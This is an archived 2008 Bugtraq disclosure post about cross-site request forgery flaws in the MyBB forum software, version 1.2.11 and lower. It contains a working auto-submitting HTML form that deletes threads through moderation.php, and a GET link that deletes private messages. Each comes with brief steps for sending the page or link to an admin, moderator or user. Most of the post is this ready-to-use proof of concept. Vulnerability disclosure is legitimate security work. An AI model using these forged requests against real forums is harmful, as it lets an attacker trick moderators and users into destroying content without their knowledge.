lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200801182150.23529.nbbn@gmx.net>
Date: Fri, 18 Jan 2008 21:50:23 +0100
From: nbbn@....net
To: bugtraq@...urityfocus.com
Subject: MyBB 1.2.11 Multiple XSRF Vulnerabilities

####################################################
Founded: 18, January 2008
Founder: nbbn
MyBB Version: 1.2.11 and lower
Type: Multiple XSRF Vulnerabilities
####################################################

####1) Delete Threads XSRF Vulnerabilitie:

<html>
<head>
</head>
<body onLoad="javascript:document.formular.submit()">
<form action="http://localhost/xampp/mybb/moderation.php" method="post" 
name="formular">
<input type="hidden" name="action" value="do_multideletethreads" />
<input type="hidden" name="fid" value="2" /> <!-- forumid -->
<input type="hidden" name="threads" value="15|14" /> <!-- threadids -->
<input type="submit"  value="Delete Threads" />
</form>


</body>
</html> 

###Poc: 
        1. Create a .html file and copy the code into it. 
        2. Upload the file and now send the link to an admin or moderator
        3. Done



####2) Delete PM's XSRF Vuln:

 This one is only doing via GET and no question: 
http://localhost/xampp/mybb/private.php?action=delete&pmid=3


###Poc: (An easy way): 

 1. Send to a user this link: 
http://localhost/xampp/mybb/private.php?action=delete&pmid=3
 2. Done







Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ